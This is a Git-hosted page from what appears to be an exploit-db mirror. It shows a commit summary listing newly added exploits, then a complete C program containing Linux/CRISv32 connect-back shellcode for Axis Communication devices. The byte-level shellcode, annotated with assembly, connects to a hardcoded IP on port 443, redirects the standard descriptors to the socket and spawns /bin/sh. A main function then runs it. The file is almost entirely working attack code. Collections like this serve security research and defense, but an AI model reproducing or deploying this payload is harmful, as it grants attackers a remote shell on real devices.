bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux_crisv32/shellcode/40128.c
Offensive Security 893d590404 DB: 2017-02-02 
12 new exploits

PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow
PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow

Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service
Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)

PHP 5.3.0 - getopt() Denial of Service
PHP 5.3.0 - 'getopt()' Denial of Service

Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service
Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (2)

PHP 4.3.x/5.0 - openlog() Buffer Overflow
PHP 4.3.x/5.0 - 'openlog()' Buffer Overflow
Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption
Google Android -  Unprotected MSRs in EL1 RKP Privilege Escalation
Apple WebKit - 'HTMLFormElement::reset()' Use-After Free
Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion
Apple WebKit - 'HTMLKeygenElement' Type Confusion
Apple WebKit - Type Confusion in RenderBox with Accessibility Enabled
Google Android - RKP Information Disclosure via s2-remapping Physical Ranges
QNAP NVR/NAS - Buffer Overflow

Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Privilege Escalation (1)
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Privilege Escalation (1)

Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Privilege Escalation (2)
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Privilege Escalation (2)

PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit
PHP 5.2.9 (Windows x86) - Local Safemod Bypass

Linux udev - Netlink Privilege Escalation (Metasploit)
Linux Kernel UDEV < 1.4.1 - Netlink Privilege Escalation (Metasploit)

Google Android - RKP EL1 Code Loading Bypass

Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)

Syntax Desktop 2.7 - (synTarget) Local File Inclusion
Syntax Desktop 2.7 - 'synTarget' Parameter Local File Inclusion
Joomla! Component JTAG Calendar 6.2.4 - 'search' Parameter SQL Injection
LogoStore - 'query' Parameter SQL Injection
2017-02-02 05:01:18 +00:00

115 lines
No EOL
4.1 KiB
C
Executable file
Raw Blame History

/*
* Title: Axis Communication Linux/CRISv32 - Connect Back Shellcode
* Author: bashis <mcw noemail.eu> / 2016
*
*/
#include <stdio.h>
char sc[] =
//close(0)
"\x7a\x86" // clear.d r10
"\x5f\x9c\x06\x00" // movu.w 0x6,r9
"\x3d\xe9" // break 13
//close(1)
"\x41\xa2" // moveq 1,r10
"\x5f\x9c\x06\x00" // movu.w 0x6,r9
"\x3d\xe9" // break 13
//close(2)
"\x42\xa2" // moveq 2,r10
"\x5f\x9c\x06\x00" // movu.w 0x6,r9
"\x3d\xe9" // break 13
//
"\x10\xe1" // addoq 16,sp,acr
"\x42\x92" // moveq 2,r9
"\xdf\x9b" // move.w r9,[acr]
"\x10\xe1" // addoq 16,sp,acr
"\x02\xf2" // addq 2,acr
//PORT 443
"\x5f\x9e\x01\xbb" // move.w 0xbb01,r9
"\xdf\x9b" // move.w r9,[acr]
"\x10\xe1" // addoq 16,sp,acr
"\x6f\x96" // move.d acr,r9
"\x04\x92" // addq 4,r9
//IP 192.168.57.1
"\x6f\xfe\xc0\xa8\x39\x01" // move.d 139a8c0,acr
"\xe9\xfb" // move.d acr,[r9]
//
//socket()
"\x42\xa2" // moveq 2,r10
"\x41\xb2" // moveq 1,r11
"\x7c\x86" // clear.d r12
"\x6e\x96" // move.d $sp,$r9
"\xe9\xaf" // move.d $r10,[$r9+]
"\xe9\xbf" // move.d $r11,[$r9+]
"\xe9\xcf" // move.d $r12,[$r9+]
"\x41\xa2" // moveq 1,$r10
"\x6e\xb6" // move.d $sp,$r11
"\x5f\x9c\x66\x00" // movu.w 0x66,$r9
"\x3d\xe9" // break 13
//
"\x6a\x96" // move.d $r10,$r9
"\x0c\xe1" // addoq 12,$sp,$acr
"\xef\x9b" // move.d $r9,[$acr]
"\x0c\xe1" // addoq 12,$sp,$acr
"\x6e\x96" // move.d $sp,$r9
"\x10\x92" // addq 16,$r9
"\x6f\xaa" // move.d [$acr],$r10
"\x69\xb6" // move.d $r9,$r11
"\x50\xc2" // moveq 16,$r12
//
// connect()
"\x6e\x96" // move.d $sp,$r9
"\xe9\xaf" // move.d $r10,[$r9+]
"\xe9\xbf" // move.d $r11,[$r9+]
"\xe9\xcf" // move.d $r12,[$r9+]
"\x43\xa2" // moveq 3,$r10
"\x6e\xb6" // move.d $sp,$r11
"\x5f\x9c\x66\x00" // movu.w 0x66,$r9
"\x3d\xe9" // break 13
//
//dup(1)
"\x6f\xaa" // move.d [$acr],$r10
"\x41\xb2" // moveq 1,$r11
"\x5f\x9c\x3f\x00" // movu.w 0x3f,$r9
"\x3d\xe9" // break 13
//
//dup(2)
"\x6f\xaa" // move.d [$acr],$r10
"\x42\xb2" // moveq 2,$r11
"\x5f\x9c\x3f\x00" // movu.w 0x3f,$r9
"\x3d\xe9" // break 13
//execve("/bin/sh",NULL,NULL)
"\x90\xe2" // subq 16,$sp
"\x6e\x96" // move.d $sp,$r9
"\x6e\xa6" // move.d $sp,$10
"\x6f\x0e\x2f\x2f\x62\x69" // move.d 69622f2f,$r0
"\xe9\x0b" // move.d $r0,[$r9]
"\x04\x92" // addq 4,$r9
"\x6f\x0e\x6e\x2f\x73\x68" // move.d 68732f6e,$r0
"\xe9\x0b" // move.d $r0,[$r9]
"\x04\x92" // addq 4,$r9
"\x79\x8a" // clear.d [$r9]
"\x04\x92" // addq 4,$r9
"\x79\x8a" // clear.d [$r9]
"\x04\x92" // addq 4,$r9
"\xe9\xab" // move.d $r10,[$r9]
"\x04\x92" // addq 4,$r9
"\x79\x8a" // clear.d [$r9]
"\x10\xe2" // addq 16,$sp
"\x6e\xf6" // move.d $sp,$acr
"\x6e\x96" // move.d $sp,$r9
"\x6e\xb6" // move.d $sp,$r11
"\x7c\x86" // clear.d $r12
"\x4b\x92" // moveq 11,$r9
"\x3d\xe9"; // break 13
void
main(void)
{
void (*s)(void);
printf("sc size %d\n", sizeof(sc));
s = sc;
s();
}
Reference in a new issue View git blame Copy permalink